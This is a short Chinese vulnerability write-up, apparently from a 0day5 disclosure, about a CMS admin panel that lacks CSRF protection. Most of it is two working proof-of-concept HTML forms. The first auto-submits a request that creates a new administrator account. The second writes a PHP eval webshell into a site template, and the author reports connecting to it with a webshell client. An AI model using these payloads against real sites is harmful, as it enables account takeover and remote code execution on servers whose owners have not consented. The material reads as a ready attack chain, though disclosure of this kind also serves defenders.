漏洞作者: 蛇精病 漏洞证明: 1、后台添加管理然后用burp截断 我们发现没有验证,然后就构造表单 <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form id="post123" name="post123" action="http://127.0.0.1/index.php?r=admin/admin/index" method="POST"> <input type="hidden" name="groupid" value="1" /> <input type="hidden" name="username" value="snake" /> <input type="hidden" name="rpassword" value="wuyun1" /> <input type="hidden" name="spassword" value="wuyun1" /> <input type="hidden" name="realname" value="" /> <input type="hidden" name="iflock" value="0" /> <script> document.getElementById('post123').submit(); </script> </form> </body> </html> 2、再来看如何getshell 模版,新建 插入一句话木马,然后截断 同样没有验证,构造表单如下 <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://127.0.0.1/index.php?r=admin/set/tpadd&Mname=default" method="POST"> <input type="hidden" name="filename" value="1" /> <input type="hidden" name="code" value="<?php eval($_POST[g]);?>" /> <input type="submit" value="Submit request" /> </form> </body> </html> 接下来用菜刀连接试试 连接成功
![23154504b17caadbc97eaaf0d9670c5dc2f4beac[1]](http://0day5.com/usr/themes/0DAY5/img/white.gif)
![23154504b17caadbc97eaaf0d9670c5dc2f4beac[1]](http://0day5.com/wp-content/uploads/2015/02/23154504b17caadbc97eaaf0d9670c5dc2f4beac1.jpg)
![23154545c45e4ecbaff45ce041c340ece24ce1be[1]](http://0day5.com/wp-content/uploads/2015/02/23154545c45e4ecbaff45ce041c340ece24ce1be1.jpg)
![2315460406f85f627c24386b185b1fadddcc13a5[1]](http://0day5.com/wp-content/uploads/2015/02/2315460406f85f627c24386b185b1fadddcc13a51.jpg)
![23154650d7cb8eb0c5b59c273863a2062ca52815[1]](http://0day5.com/wp-content/uploads/2015/02/23154650d7cb8eb0c5b59c273863a2062ca528151.jpg)